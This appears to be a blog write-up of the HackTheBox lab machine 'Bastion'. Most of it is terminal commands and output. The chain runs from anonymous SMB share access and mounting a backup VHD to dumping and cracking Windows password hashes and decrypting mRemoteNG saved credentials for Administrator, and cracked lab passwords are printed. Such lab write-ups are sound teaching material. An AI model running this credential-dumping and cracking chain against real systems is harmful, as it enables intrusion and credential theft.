Bastion - HackTheBox
I started by doing a port scan with Nmap.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.134 -oG allPorts
Starting Nmap 7.80 (https://nmap.org) at 2021-07-03 12:05 CEST
Initiating SYN Stealth Scan at 12:05
Scanning 10.10.10.134 [1000 ports]
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Increasing send delay for 10.10.10.134 from 0 to 5 due to 226 out of 753 dropped probes since last increase.
Completed SYN Stealth Scan at 12:05, 0.32s elapsed (1000 total ports)
Nmap scan report for 10.10.10.134
Host is up (0.066s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
Raw packets sent: 1226 (53,944KB) | Rcvd: 1000 (40,016KB)
Perform another scan with Nmap to verify the version and service of each port.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p22,135,139,445 10.10.10.134 -oN targeted
Starting Nmap 7.80 (https://nmap.org) at 2021-07-03 12:06 CEST
Nmap scan report for 10.10.10.134
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m57s, deviation: 1h09m14s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-03T12:06:50+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T10:06:47
|_ start_date: 2021-07-02T05:29:28
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 17.94 seconds
It was an active directory machine, I tried listing the smb shares with smbmap.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbclient -L 10.10.10.134 -N
Sharename Type Comment
---------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
There was one share that caught my attention called “Backups”, I accessed it using smbclient.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbclient //10.10.10.134/Backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 3 12:06:43 2021
.. Sun 0 Sat Jul 3 12:06:43 2021
DLGNBAIZQY Sun 0 Sat Jul 3 11:53:08 2021
DOGFHMUXVJ Sun 0 Sat Jul 3 12:01:13 2021
GPCBDFSRMX Sun 0 Sat Jul 3 11:42:32 2021
IXFAVGWEBT D 0 Sat Jul 3 12:06:43 2021
IYEGGPWVFX Sun 0 Sat Jul 3 11:42:25 2021
LOXSWDGATI Sun 0 Sat Jul 3 11:53:33 2021
MekVBwjJhm Sun 0 Sat Jul 3 10:25:39 2021
NALTHZGBUM Sun 0 Sat Jul 3 12:01:50 2021
NErDtnufMa Sun 0 Sat Jul 3 10:25:08 2021
nmap-test-file A 260 Sat Jul 3 11:43:24 2021
note.txt AR 116 Tue Apr 16 12:10:09 2019
QOGTYSUHIF D 0 Sat Jul 3 11:54:32 2021
SDT65CB.tmp At 0 Fri Feb 22 13:43:08 2019
VWUELPZQHO D 0 Fri Jul 2 13:20:49 2021
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
XSWORGUCYL D 0 Sat Jul 3 11:57:41 2021
yGvfilWFPD Sun 0 Sat Jul 3 11:21:00 2021
ZESQVIRNWM Sun 0 Sat Jul 3 12:05:33 2021
7735807 blocks of size 4096. 2760862 blocks available
I saw the note.txt file and without thinking twice I downloaded it with the ‘get’ command, this is what I had.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
It said not to transfer the entire backup file, so I thought maybe I need to find a backup file, next to what I knew there was a directory called WindowsImageBackup and I followed this path WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351 and I found two .vhd files.
124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
These files represent a virtual hard drive, so if I accessed them I might find interesting things, but they are very large, so I thought I would create a mount so I wouldn’t have to download them.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mkdir local_share
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mount -t cifs //10.10.10.134/backups /mnt/local_share -o user=,password=
I accessed the mount and mounted the second vhd file to see what I had.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mkdir /mnt/vhd
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ guestmount --add /mnt/local_share/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
If using guestfish '-i' option, remove this option and instead
use the commands 'run' followed by 'list-filesystems'.
You can then mount filesystems you want by hand using the
'mount' or 'mount-ro' command.
If using guestmount '-i', remove this option and choose the
filesystem(s) you want to see by manually adding '-m' option(s).
Use 'virt-filesystems' to see what filesystems are available.
If using other virt tools, this disk image won't work
with these tools. Use the guestfish equivalent commands
(see the virt tool manual page).
Once the vhd file was finished mounting, I accessed it and in the path C:\Windows\System32\conf\, I found the SAM and SYSTEM files, I used samdump2 to dump the Windows password hashes
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
I managed to crack the hash of user l4mpje with john the ripper.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
office lamp (L4mpje)
2g 0:00:00:00 DONE (2021-07-03 13:53) 2.272g/s 10676Kp/s 10676Kc/s 10682KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
Since the machine had SSH enabled, I tried authenticating as the user l4mpje with the cracked credentials and it worked.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ ssh l4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
ESCALATION OF PRIVILEGES
The user flag that was on the Desktop, now only the privilege escalation was missing, after a little investigation, in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\ I found a .xml file that had some encoded credentials.
l4mpje@BASTION C:\Users\L4mpje> type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" Encryption
Engine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZS
vKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVers
ion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662
a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9k
VqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="
RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToI
dleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="F
itToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoo
thing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" R
edirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPla
and" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacA
ddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode=
"AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPa
ssword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsa
geMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername=
"" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" Inh
eritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnab
leFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIco
n="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="fals
e" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" Inh
eritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" Inhe
ritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticR
esize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine=
"false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLev
el="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoad
BalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false"
InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding
="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" Inheri
tVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNC
Colors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageM
ethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false"
InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false"
/>
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d357
9b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdm
bMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP"
PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rendering
Engine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTi
meout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToW
indow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing
="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" Redire
ctPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" So
undQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddres
s="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="Auth
VNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPasswor
d="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMet
hod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RD
GatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritD
escription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFon
tSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="fa
lse" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" In
heritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritR
edirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRe
directSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize
="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="fals
e" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="f
also" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalan
ceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" Inhe
ritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false
se" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCP
roxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColor
s="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod
="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" Inher
itRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
I decrypted it with mremoteng_decrypt.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 mremoteng_decrypt.py -f hash
Password: thXLHM96BeKL0ER2
I authenticated to SSH as the Administrator user with the credentials I had and got ROOT.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>
Leave a comment